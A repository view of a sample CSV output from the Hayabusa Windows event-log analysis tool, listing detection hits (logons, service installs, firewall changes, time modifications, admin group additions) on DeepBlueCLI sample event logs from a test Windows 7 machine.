CSEC_PUBLIC/hayabusa
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
Files
62e11a2f4ffa40a768096ca9218d0258f8228274
hayabusa/sample-evtx-default-rules.csv
Tanaka Zakku aa74af4177 update
2022-04-15 11:14:42 +09:00

6.2 MiB
Raw Blame History

1TimestampComputerEventIDLevelMitreAttackRuleTitleDetailsRulePathFilePath
22013-10-24 01:16:13.843 +09:0037L4247D28-054624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
32013-10-24 01:16:27.000 +09:0037L4247D28-056005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
42013-10-24 01:16:29.000 +09:0037L4247D28-054625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
52013-10-24 01:17:29.468 +09:0037L4247D28-057045infoNew Service InstalledName: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
62013-10-24 01:17:32.328 +09:0037L4247D28-057045infoNew Service InstalledName: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
72013-10-24 01:17:38.218 +09:0037L4247D28-057045infoNew Service InstalledName: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
82013-10-24 01:17:40.125 +09:0037L4247D28-057045infoNew Service InstalledName: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
92013-10-24 01:17:41.421 +09:0037L4247D28-057045infoNew Service InstalledName: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
102013-10-24 01:17:43.125 +09:0037L4247D28-057045infoNew Service InstalledName: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account: | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
112013-10-24 01:17:44.875 +09:0037L4247D28-057045infoNew Service InstalledName: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
122013-10-24 01:18:09.203 +09:0037L4247D28-052003lowSetting Change in Windows Firewall with Advanced Securityrules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
132013-10-24 01:18:09.203 +09:0037L4247D28-052004mediumAdded Rule in Windows Firewall with Advanced Securityrules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
142013-10-24 01:18:11.000 +09:0037L4247D28-056006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
152013-10-24 01:18:50.500 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
162013-10-24 01:21:28.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
172013-10-24 01:21:30.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
182013-10-24 01:21:33.630 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
192013-10-24 01:22:39.911 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
202013-10-24 01:22:39.973 +09:00IE8Win74720lowPersisLocal User Account CreatedUser: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
212013-10-24 01:22:39.973 +09:00IE8Win74720lowPersisLocal User Account CreatedUser: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
222013-10-24 01:22:40.004 +09:00IE8Win74732highPersisUser Added To Local Administrators GroupSID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
232013-10-24 01:22:40.004 +09:00IE8Win74732highPersisUser Added To Local Administrators GroupSID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
242013-10-24 01:22:44.979 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
252013-10-24 01:22:44.979 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
262013-10-24 01:22:44.979 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
272013-10-24 01:22:44.979 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x298c5rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
282013-10-24 01:24:00.161 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
292013-10-24 02:27:21.754 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x29908rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
302013-10-24 02:29:39.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
312013-10-24 02:30:52.625 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
322013-10-24 02:30:56.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
332013-10-24 02:30:58.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
342013-10-24 02:31:10.741 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
352013-10-24 02:32:13.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
362013-10-24 02:33:10.078 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
372013-10-24 02:33:15.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
382013-10-24 02:33:18.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
392013-10-24 02:33:31.593 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
402013-10-24 02:36:53.671 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
412013-10-24 02:36:53.671 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
422013-10-24 02:36:53.671 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
432013-10-24 02:36:53.671 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x57d5brules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
442013-10-24 02:45:29.131 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
452013-10-24 02:45:45.037 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x57d8drules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
462013-10-24 02:46:48.772 +09:00IE8Win77045infoNew Service InstalledName: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
472013-10-24 02:48:35.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
482013-10-24 02:50:25.546 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
492013-10-24 02:50:26.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
502013-10-24 02:50:27.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
512013-10-24 02:50:33.551 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
522013-10-24 02:51:17.207 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
532013-10-24 02:51:17.207 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
542013-10-24 02:51:17.207 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
552013-10-24 02:51:17.207 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x27f43rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
562013-10-24 02:55:52.082 +09:00IE8Win77045infoNew Service InstalledName: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
572013-10-24 04:02:24.316 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x27f73rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
582013-10-24 04:03:23.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
592013-10-24 04:04:28.750 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
602013-10-24 04:04:53.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
612013-10-24 04:04:55.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
622013-10-24 04:05:04.098 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
632013-10-24 04:05:33.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
642013-10-24 04:06:18.921 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
652013-10-24 04:06:22.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
662013-10-24 04:06:25.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
672013-10-24 04:07:16.729 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
682013-10-24 04:18:24.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
692013-10-24 04:19:46.750 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
702013-10-24 04:19:51.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
712013-10-24 04:19:52.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
722013-10-24 04:20:01.879 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
732013-10-24 04:21:52.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
742013-10-24 04:23:04.093 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
752013-10-24 04:23:07.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
762013-10-24 04:23:08.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
772013-10-24 04:23:18.798 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
782013-10-24 04:27:14.204 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
792013-10-24 04:27:14.204 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
802013-10-24 04:27:14.204 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
812013-10-24 04:27:14.204 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x39a20rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
822013-10-24 04:34:54.649 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x39a67rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
832013-10-24 04:35:55.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
842013-10-24 04:36:39.718 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
852013-10-24 04:36:43.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
862013-10-24 04:36:44.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
872013-10-24 04:36:53.245 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
882013-10-24 04:38:41.448 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
892013-10-24 04:38:41.448 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
902013-10-24 04:38:41.448 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
912013-10-24 04:38:41.448 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x24902rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
922013-10-24 04:42:34.667 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
932013-10-24 04:42:56.213 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x24936rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
942013-10-24 04:44:06.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
952013-10-24 04:45:58.015 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
962013-10-24 04:45:59.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
972013-10-24 04:46:01.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
982013-10-24 04:46:10.368 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
992013-10-24 04:47:07.743 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1002013-10-24 04:47:07.743 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1012013-10-24 04:47:07.743 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1022013-10-24 04:47:07.743 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x19489rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1032013-10-24 04:54:00.258 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x194bbrules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1042013-10-24 04:54:08.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1052013-10-24 04:54:58.140 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1062013-10-24 04:55:00.000 +09:00IE8Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1072013-10-24 04:55:02.000 +09:00IE8Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
1082013-10-24 04:55:06.370 +09:00IE8Win74616mediumEvasUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1092013-10-24 04:55:29.463 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1102013-10-24 04:55:29.463 +09:00IE8Win74648infoPrivEsc | LatMovExplicit LogonSource User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1112013-10-24 04:55:29.463 +09:00IE8Win74624infoLogon Type 2 - InteractiveUser: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x1917f | (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1122013-10-24 04:55:29.463 +09:00IE8Win74672infoAdmin LogonUser: IEUser | LID: 0x19153rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1132013-10-24 05:49:57.323 +09:00IE8Win74647infoLogoff - User InitiatedUser: IEUser | LID: 0x1917frules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
1142013-10-24 05:52:14.000 +09:00IE8Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
1152013-10-24 05:54:11.078 +09:00IE8Win74624infoLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
